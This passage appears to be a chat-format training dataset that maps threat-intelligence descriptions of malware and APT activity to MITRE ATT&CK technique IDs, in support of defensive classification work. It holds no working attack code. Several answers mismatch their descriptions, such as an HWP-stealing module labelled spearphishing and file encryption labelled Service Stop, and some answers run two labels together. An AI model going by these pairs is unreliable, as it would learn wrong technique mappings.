- "content": "Four files tested in 2014 are based on the open-source project, cryptcat. Analysis of these cryptcat binaries indicates that the actor continually modified them to decrease AV detection rates. One of these files was deployed in a TEMP.Veles target’s network. The compiled version with the least detections was later re-tested in 2017 and deployed less than a week later during TEMP.Veles activities in the target environment. TEMP.Veles’ lateral movement activities used a publicly-available PowerShell-based tool, WMImplant. On multiple dates in 2017, TEMP.Veles struggled to execute this utility on multiple victim systems, potentially due to AV detection. Four files tested in 2014 are based on the open-source project, cryptcat. Analysis of these cryptcat binaries indicates that the actor continually modified them to decrease AV detection rates. One of these files was deployed in a TEMP.Veles target’s network. On multiple dates in 2017, TEMP.Veles struggled to execute this utility on multiple victim systems, potentially due to AV detection"
- },
- {
- "role": "assistant",
- "content": "T1027.005 - Indicator Removal from Tools"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "This module intercepts HWP documents on an infected computer. The HWP file format is similar to Microsoft Word documents, but supported by Hangul, a South Korean word processing application from the Hancom Office bundle. Hancom Office is widely used in South Korea. The account is hardcoded in the module along with the master’s e-mail to which it sends intercepted documents. It is interesting that the module does not search for all the HWP files on infected computer, but reacts only to those that are opened by the user and steals them. This behavior is very unusual for a document-stealing component and we do not see it in other malicious toolkits"
- },
- {
- "role": "assistant",
- "content": "T1566.001 - Phishing: Spearphishing Attachment"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "ADVSTORESHELL can enumerate registry keys."
- },
- {
- "role": "assistant",
- "content": "T1012 - Query Registry"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "actors used the native Windows task scheduler tool to use scheduled tasks for execution on a victim network."
- },
- {
- "role": "assistant",
- "content": "T1053.005 - Scheduled Task/Job: Scheduled Task"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "used regsvr32.exe to execute scripts."
- },
- {
- "role": "assistant",
- "content": "T1218.010 - Signed Binary Proxy Execution: Regsvr32"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "can be used to execute binaries on remote systems by creating and starting a service."
- },
- {
- "role": "assistant",
- "content": "T1569.002 - System Services: Service Execution"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "ShadowPad has collected the domain name of the victim system."
- },
- {
- "role": "assistant",
- "content": "T1016 - System Network Configuration Discovery"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "has a module for performing remote desktop access."
- },
- {
- "role": "assistant",
- "content": "T1021.001 - Remote Services: Remote Desktop Protocol"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "APT41 has used hashdump, Mimikatz, and the Windows Credential Editor to dump password hashes from memory and authenticate to other user accounts."
- },
- {
- "role": "assistant",
- "content": "T1003.001 - OS Credential Dumping: LSASS Memory"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "RDAT can use email attachments for C2 communications."
- },
- {
- "role": "assistant",
- "content": "T1071.003 - Mail Protocols"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "H1N1 obfuscates C2 traffic with an altered version of base64."
- },
- {
- "role": "assistant",
- "content": "T1132 - Data Encoding"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "The Exaramel for Windows dropper creates and starts a Windows service named wsmprovav with the description “Windows Check AV” in an apparent attempt to masquerade as a legitimate service."
- },
- {
- "role": "assistant",
- "content": "T1036.004 - Masquerading: Masquerade Task or Service"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Despite the notion that modern cybersecurity protocols have stopped email-based attacks, email continues to be one of the primary attack vectors for malicious actors — both for widespread and targeted operations. Recently, Cisco Talos has observed numerous email-based attacks that are spreading malware to users at both a large and small scale. In this blog post, we analyze several of those campaigns and their tactics, techniques and procedures (TTPs). These campaigns were all observed between mid-May and early July of this year, and can likely be attributed to one, or possibly two, groups. Other researchers have attributed these attacks to a group known as the Cobalt Gang, which has continued its activities even after the arrest of its alleged leader in Spain this year. Simple campaigns typically use a single technique and often embed the final executable payload into the exploit document. The malicious emails display a strong command of the English language, and their content may have been taken from legitimate emails relevant to the business of the targeted organization. The emails either contain a URL pointing to one of the three document types or have initial attack stages attached outright"
- },
- {
- "role": "assistant",
- "content": "T1559.002 - Inter-Process Communication: Dynamic Data Exchange"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "DDKONG decodes an embedded configuration using XOR."
- },
- {
- "role": "assistant",
- "content": "T1140 - Deobfuscate/Decode Files or Information"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "The group is known to utilize WMI for lateral movement."
- },
- {
- "role": "assistant",
- "content": "T1047 - Windows Management Instrumentation"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "1) Creating malicious Word documents by injecting a remote template URL 2) Hosting a C2 server to gather credentials entered into authentication dialog boxes displayed when attempting to obtain the remote template"
- },
- {
- "role": "assistant",
- "content": "T1221 - Template Injection"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Chimera has dumped password hashes for use in pass the hash authentication attacks."
- },
- {
- "role": "assistant",
- "content": "T1550.002 - Use Alternate Authentication Material: Pass the Hash"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "likely obtained a list of hosts in the victim environment."
- },
- {
- "role": "assistant",
- "content": "T1018 - Remote System Discovery"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "can list files and directories."
- },
- {
- "role": "assistant",
- "content": "T1083 - File and Directory Discovery"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Lazarus Group has used a VBA Macro to set its file attributes to System and Hidden and has named files with a dot prefix to hide them from the Finder application."
- },
- {
- "role": "assistant",
- "content": "T1564.001 - Hide Artifacts: Hidden Files and Directories"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "jRAT uses WMIC to identify anti-virus products installed on the victim’s machine and to obtain firewall details."
- },
- {
- "role": "assistant",
- "content": "T1047 - Windows Management Instrumentation"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "The two resources that contain commands that ISMInjector uses for persistence are named “Tsk1” and “Tsk2”. The specific commands within each of these resources are within Table 1. At a high level, the“Tsk1” command creates a scheduled task named “ReportHealth” that is meant to run a payload saved to \"%localappdata%\\srvHealth.exe” every 4 minutes. The “Tsk2” command creates a scheduled task that runs every 2 minutes that is responsible for saving the payload to srvHealth.exe. This task saves the payload to this location using the “certutil” command to decode the original payload saved to “srvBS.txt"
- },
- {
- "role": "assistant",
- "content": "T1053.005 - Scheduled Task/Job: Scheduled Task', 'T1140 - Deobfuscate/Decode Files or Information"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Pasam creates a backdoor through which remote attackers can upload files."
- },
- {
- "role": "assistant",
- "content": "T1105 - Ingress Tool Transfer"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "menuPass has registered malicious domains for use in intrusion campaigns."
- },
- {
- "role": "assistant",
- "content": "T1583.001 - Domains"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "APT37 has used Windows DDE for execution of commands and a malicious VBS."
- },
- {
- "role": "assistant",
- "content": "T1559.002 - Inter-Process Communication: Dynamic Data Exchange"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "APT29 has used multiple command-line utilities to enumerate running processes."
- },
- {
- "role": "assistant",
- "content": "T1057 - Process Discovery"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "The checks are done in an obfuscated way within the jumble of the code that the malware has (in the virtual machine used here the Spanish language of Spain (es-ES) was used; it is the code 0xC0A that appears in the stack in the screenshot"
- },
- {
- "role": "assistant",
- "content": "T1082 - System Information Discovery"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Siloscape itself is obfuscated and uses obfuscated API calls."
- },
- {
- "role": "assistant",
- "content": "T1027 - Obfuscated Files or Information"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Data captured by is placed in a temporary file under a directory named \"memdump\"."
- },
- {
- "role": "assistant",
- "content": "T1074 - Data Staged"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Bumblebee can create a Visual Basic script to enable persistence."
- },
- {
- "role": "assistant",
- "content": "T1059.005 - Command and Scripting Interpreter: Visual Basic"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "After successfully executing the command, POWRUNER sends the results back to the C2 server and stops execution"
- },
- {
- "role": "assistant",
- "content": "T1059.003 - Command and Scripting Interpreter: Windows Command Shell"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "PyDCrypt has decrypted and dropped the DCSrv payload to disk."
- },
- {
- "role": "assistant",
- "content": "T1140 - Deobfuscate/Decode Files or Information"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "PoetRAT has executed a Lua script through a Lua interpreter for Windows."
- },
- {
- "role": "assistant",
- "content": "T1059 - Command and Scripting Interpreter"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Gelsemium can enumerate running processes."
- },
- {
- "role": "assistant",
- "content": "T1057 - Process Discovery"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Pupy can send screenshots files, keylogger data, files, and recorded audio back to the C2 server."
- },
- {
- "role": "assistant",
- "content": "T1041 - Exfiltration Over C2 Channel"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Sibot has queried the registry for proxy server information."
- },
- {
- "role": "assistant",
- "content": "T1012 - Query Registry"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "OilRig has deleted files associated with their payload after execution."
- },
- {
- "role": "assistant",
- "content": "T1070.004 - Indicator Removal on Host: File Deletion"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Following the initial compromise, in many instances the BackdoorDiplomacy group employed open-source reconnaissance and red-team tools to evaluate the environment for additional targets of opportunity and lateral movement. Among the tools documented are"
- },
- {
- "role": "assistant",
- "content": "T1105 - Ingress Tool Transfer', 'T1588.002 - Tool"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "When the malicious RTF document is opened, two things happen that allow the attacker malware to run. First, the \"packager trick\" is leveraged in order to embed the initial QuasarRAT dropper (qrat.exe) in the malicious RTF document. Its called the \"packager trick\" because any file embedded in an RTF file using packager will be automatically dropped to the %tmp% folder (c:\\Users\\%username%\\AppData\\Local\\Temp) when the RTF document is opened. Second, the threat actors exploit CVE-2017-8570 to achieve code execution via a malicious \"scriptlet\" file, or .sct file, which is also embedded in the malicious RTF document. The contents of the malicious scriptlet file (displayed below) clearly show the threat actor executing the initial \"qrat.exe\" dropper from the current user's %tmp% directory"
- },
- {
- "role": "assistant",
- "content": "T1204.002 - User Execution: Malicious File"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "can delete files and itself after infection to avoid analysis."
- },
- {
- "role": "assistant",
- "content": "T1070.004 - Indicator Removal on Host: File Deletion"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "At a high-level, their targeting of financial organizations and subsequent heists have followed the same general pattern: Information Gathering: Conducted research into an organization’s personnel and targeted third party vendors with likely access to SWIFT transaction systems to understand the mechanics of SWIFT transactions on victim networks (Please note: The systems in question are those used by the victim to conduct SWIFT transactions"
- },
- {
- "role": "assistant",
- "content": "T1018 - Remote System Discovery"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "POWERSTATS has used \"get_tasklist\" to discover processes on the compromised host."
- },
- {
- "role": "assistant",
- "content": "T1057 - Process Discovery"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "FruitFly will delete files on the system."
- },
- {
- "role": "assistant",
- "content": "T1070.004 - Indicator Removal on Host: File Deletion"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "The worm deploys the XMRig mining tool to mine monero crypto-currency and generate cash for the attackers. One of the Mining pools they use provides detailed information about the systems the worm has compromised"
- },
- {
- "role": "assistant",
- "content": "T1496 - Resource Hijacking"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "MuddyWater has exploited the Microsoft Exchange memory corruption vulnerability (CVE-2020-0688)."
- },
- {
- "role": "assistant",
- "content": "T1190 - Exploit Public-Facing Application"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "The scripts themselves could be easily extracted and decompiled out of the binaries using uncompyle. The decompiled scripts employed some visual obfuscation techniques by naming variables as combinations of the characters ‘o’, ‘O’, and ‘0’ to hinder analysis. In-depth analysis of the scripts showed the group employed AES in CBC mode using a predefined static key to encrypt files before uploading them to the C2 server"
- },
- {
- "role": "assistant",
- "content": "T1027 - Obfuscated Files or Information"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "During Operation Wocao, threat actors spawned a new `cmd.exe` process to execute commands."
- },
- {
- "role": "assistant",
- "content": "T1059.003 - Command and Scripting Interpreter: Windows Command Shell"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "BadPatch collects the OS system, OS version, MAC address, and the computer name from the victim’s machine."
- },
- {
- "role": "assistant",
- "content": "T1082 - System Information Discovery"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "If the user opens the file and the exploitation is successful, a backdoor Trojan is installed on the system that gives the attacker access and a decoy document is displayed to the victim. The main module is also responsible for communicating with its C2 servers and handling commands issued by the C2 server. Figure 8: FakeM Architecture . All FakeM variants initiate communications with its C2 server and check the C2’s response for a command. After sending the acknowledgement packet, the Trojan will gather local system information and include it in a beacon to the C2 server. The Trojan uses AES to encrypt the communication channel its C2 server, which will provide one of three commands to carry out activities on the compromised system, as seen in Table 4. Unit 42 tracks this mobile Trojan as MobileOrder, as the authors specifically refer to commands within the app as orders. MobileOrder acts on instructions provided by its C2 server, which it communicates with over TCP port 3728. The C2 server will respond to requests from MobileOrder with commands that the Trojan refers to as “orders”. MobileOrder contains a command handler with functionality that provides a fairly robust set of commands, as seen in Table 6. Table 6: MobileOrder command handler . Infrastructure Overlap and Related Tools . There is some infrastructure overlap in the C2 servers used by almost all of the FakeM variants, as well other Trojans such as MobileOrder, Psylo, and CallMe. Actors will run HTRAN on a server and configure their malware to interact with that server; however, the actor will configure HTRAN to forward traffic to another server where the actual C2 server exists"
- },
- {
- "role": "assistant",
- "content": "T1083 - File and Directory Discovery"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Maze has gathered all of the running system processes."
- },
- {
- "role": "assistant",
- "content": "T1057 - Process Discovery"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "RemoteCMD can execute commands remotely by creating a new service on the remote system."
- },
- {
- "role": "assistant",
- "content": "T1569.002 - System Services: Service Execution"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "OopsIE compresses collected files with GZipStream before sending them to its C2 server."
- },
- {
- "role": "assistant",
- "content": "T1560.001 - Archive Collected Data: Archive via Utility"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "The Leeson, Neoichor, and NumbIdea malware families typically use the Internet Explorer (IE) COM interface to connect and receive commands from hardcoded C2 servers"
- },
- {
- "role": "assistant",
- "content": "T1559.001 - Component Object Model"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "can establish persistence by creating a scheduled task."
- },
- {
- "role": "assistant",
- "content": "T1053.005 - Scheduled Task/Job: Scheduled Task"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "infpub.dat appears to be capable of brute-forcing NTLM login credentials to Windows machines that have pseudo-random IP addresses"
- },
- {
- "role": "assistant",
- "content": "T1110.003 - Brute Force: Password Spraying"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "gathers domain and account names/information through process monitoring."
- },
- {
- "role": "assistant",
- "content": "T1087 - Account Discovery"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "ZLib has the ability to obtain screenshots of the compromised system."
- },
- {
- "role": "assistant",
- "content": "T1113 - Screen Capture"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "can enumerate Registry values, keys, and data."
- },
- {
- "role": "assistant",
- "content": "T1012 - Query Registry"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "MuddyWater has used malware that has the capability to execute malicious code via COM, DCOM, and Outlook."
- },
- {
- "role": "assistant",
- "content": "T1559.001 - Component Object Model"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Each targeted file is opened, read, encrypted in memory, and then written to a new file in the malware’s working directory using the filename format <random number>.WNCRYT. The files are then renamed to their original filename followed by the .WINCRY extension and moved to their original directory. The taskdl.exe process launched by the malware periodically deletes the remaining WINCRYT temporary files. The encryption process does not directly overwrite file data, so forensic recovery of file contents may be possible depending on the environment. The entire contents of the file are encrypted and saved with a custom header (see Figure 7"
- },
- {
- "role": "assistant",
- "content": "T1489 - Service Stop"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Leviathan has sent spearphishing attachments attempting to get a user to click."
- },
- {
- "role": "assistant",
- "content": "T1204.002 - User Execution: Malicious File"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "TA551 has prompted users to enable macros within spearphishing attachments to install malware."
- },
- {
- "role": "assistant",
- "content": "T1204.002 - User Execution: Malicious File"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "PowerSploit contains a collection of Exfiltration modules that can harvest credentials from Group Policy Preferences."
- },
- {
- "role": "assistant",
- "content": "T1552.006 - Unsecured Credentials: Group Policy Preferences"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "HAFNIUM has used \"rundll32\" to load malicious DLLs."
- },
- {
- "role": "assistant",
- "content": "T1218.011 - Signed Binary Proxy Execution: Rundll32"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "StoneDrill has relied on injecting its payload directly into the process memory of the victim's preferred browser."
- },
- {
- "role": "assistant",
- "content": "T1055 - Process Injection"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "MuddyWater has used malware that can upload additional files to the victim’s machine."
- },
- {
- "role": "assistant",
- "content": "T1105 - Ingress Tool Transfer"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "It was pretending to be an Adobe flash player update installer on a compromised website to lure users to click for the execution"
- },
- {
- "role": "assistant",
- "content": "T1036 - Masquerading"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "During Operation CuckooBees, the threat actors used the `net user` command to gather account information."
- },
- {
- "role": "assistant",
- "content": "T1087.001 - Account Discovery: Local Account"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "In March, we discovered a targeted campaign to distribute Milum, a Trojan designed to gain remote control of devices in target organizations, some of which operate in the industrial sector. The first signs of this operation, which we have dubbed WildPressure, can be traced back to August 2019; still, the campaign remains active. The Milum samples we have seen so far do not share any code similarities with any known APT campaigns. The malware provides attackers with remote control over infected devices, allows downloading and executing commands, collecting and exfiltrating information and installing upgrades in the malware."
- },
- {
- "role": "assistant",
- "content": "T1588.001 - Malware"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
